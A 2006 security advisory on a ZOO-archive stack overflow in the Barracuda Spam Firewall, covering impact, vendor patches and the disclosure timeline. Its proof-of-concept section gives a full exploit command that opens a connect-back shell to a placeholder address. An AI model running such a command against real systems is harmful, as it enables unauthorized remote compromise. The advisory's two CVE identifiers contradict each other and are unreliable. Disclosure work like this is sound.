Topic: Barracuda ZOO archiver security bug leads to remote compromise Announced: 2006-04-03 Product: Barracuda Spam Firewall Vendor: http://www.barracudanetworks.com/ Impact: Remote shell access Affected product: Barracuda with firmware < 3.3.03.022 AND spamdef < 3.0.9388 Credits: Jean-Sébastien Guay-Leroux CVE ID: CVE-2004-0234 I. BACKGROUND The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization by providing the following protection: * Anti-spam * Anti-virus * Anti-spoofing * Anti-phishing * Anti-spyware (Attachments) * Denial of Service II. DESCRIPTION: When building a special ZOO archive with long filenames in it, it is possible to overflow a buffer on the stack used by the program and seize control of the program. Since this component is used when scanning an incoming email, remote compromise is possible by sending a simple email with the specially crafted ZOO archive attached to the Barracuda Spam Firewall. You do NOT need to have remote administration access (on port 8000) for successfull exploitation. For further informations about the details of the bug, you can consult OSVDB #23460 . III. IMPACT Gain shell access to the remote Barracuda Spam Firewall IV. PROOF OF CONCEPT Using the PIRANA framework, available at http://www.guay-leroux.com , it is possible to test the Barracuda Spam Firewall against the ZOO vulnerability. By calling PIRANA the way it is described below, you will get a TCP connect back shell on IP address 1.2.3.4 and port 1234: perl pirana.pl -e 4 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \ -p 1234 -z -c 1 -d 1 V. SOLUTION Barracuda Networks pushed an urgent critical patch in spamdef #3.0.9388, available March 3rd 2006. They also published an official patch in firmware #3.3.03.022, available April 3rd 2006. It is recommended to update to firmware #3.3.03.022 . VI. CREDITS Jean-Sébastien Guay-Leroux who found the original flaw, conducted further research on the bug and produced exploitation plugin for the PIRANA framework. VII. REFERENCES http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0855 VIII. HISTORY 2006-03-02 : Disclosure of vulnerability to Barracuda Networks 2006-03-02 : Acknowledgement of the problem 2006-03-03 : Problem fixed 2006-04-03 : Advisory disclosed to public